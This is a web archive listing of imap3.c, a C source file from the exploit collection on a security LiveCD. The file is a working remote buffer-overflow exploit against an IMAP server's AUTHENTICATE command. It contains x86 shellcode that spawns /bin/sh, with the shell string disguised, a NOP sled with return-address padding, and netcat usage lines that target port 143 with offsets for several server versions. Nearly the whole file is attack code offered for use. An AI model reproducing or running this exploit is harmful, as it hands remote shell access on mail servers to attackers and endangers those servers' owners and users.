home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / imapd / imap3.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  3KB  |  79 lines
  1. /*----------imap3----------------------------------------------
  2. (./imap3 -1000;cat )|./nc ip 143          10.233 = -1000
  3. (./imap3 -500;cat )|./nc ip 143           10.205 = -500
  4. (./imap3 0;cat)|./nc ip 143               10.203 = 0     
  5. (./imap3 0;cat)|./nc ip 143               10.196 = 0
  6. (./imap3 0;cat)|./nc ip 143               10.190 = 0
  7. (./imap3 -1000;cat )|./nc ip 143          10.166 = -1000
  8. (./imap3 -1500;cat )|./nc ip 143          9.0    = -1500/-1000
  9. --------------------------------------------------------------*/
  10.  
  11. #include<stdio.h>
  12. #include<stdlib.h>
  13.  
  14. #define OFFSET                            0
  15. #define RET_POSITION                   1032
  16. #define RANGE                            20
  17. #define NOP                            0x90
  18.  
  19. char shellcode[1024]=
  20.   "\xeb\x38"                      /* jmp 0x38       [2000]*/
  21.   "\x5e"                          /* popl %esi      [2000]*/
  22.   "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi) */
  23.   "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi) */
  24.   "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi) */
  25.   "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi) */
  26.   "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi) */
  27.   "\x89\xf0"                      /* movl %esi,%eax [2000]*/
  28.   "\x83\xc0\x08"                  /* addl $0x8,%eax [2000]*/
  29.   "\x89\x46\x08"                  /* movl %eax,0x8(%esi)  */
  30.   "\x31\xc0"                      /* xorl %eax,%eax [2000]*/
  31.   "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
  32.   "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  */
  33.   "\xb0\x0b"                      /* movb $0xb,%al  [2000]*/
  34.   "\x89\xf3"                      /* movl %esi,%ebx [2000]*/
  35.   "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  */
  36.   "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  */
  37.   "\xcd\x80"                      /* int $0x80      [2000]*/
  38.   "\x31\xdb"                      /* xorl %ebx,%ebx [2000]*/
  39.   "\x89\xd8"                      /* movl %ebx,%eax [2000]*/
  40.   "\x40"                          /* inc %eax       [2000]*/
  41.   "\xcd\x80"                      /* int $0x80      [2000]*/
  42.   "\xe8\xc3\xff\xff\xff"          /* call -0x3d     [2000]*/
  43.   "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"    */ /*
  44. /bin/sh is disguised */
  45.  
  46. void main(int argc,char **argv)
  47. {
  48.   char buff[RET_POSITION+RANGE+1],*ptr;
  49.   long *addr_ptr,addr;
  50.   unsigned long sp;
  51.   int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
  52.   int i;
  53.  
  54.   if(argc>1)
  55.     offset=atoi(argv[1]);
  56.  
  57.   sp=0xbffff29f;
  58.   addr=sp-offset;
  59.  
  60.   ptr=buff;
  61.   addr_ptr=(long*)ptr;
  62.   for(i=0;i<bsize;i+=4)
  63.     *(addr_ptr++)=addr;
  64.  
  65.   for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
  66.     buff[i]=NOP;
  67.  
  68.   ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
  69.   for(i=0;i<strlen(shellcode);i++)
  70.     *(ptr++)=shellcode[i];
  71.  
  72.   buff[bsize-1]='\0';
  73.  
  74.   printf("* AUTHENTICATE {%d}\r\n",bsize);
  75.   for(i=0;i<bsize;i++)
  76.     putchar(buff[i]);
  77.   printf("\r\n");
  78. }
  79. /*                    www.hack.co.za              [2000]*/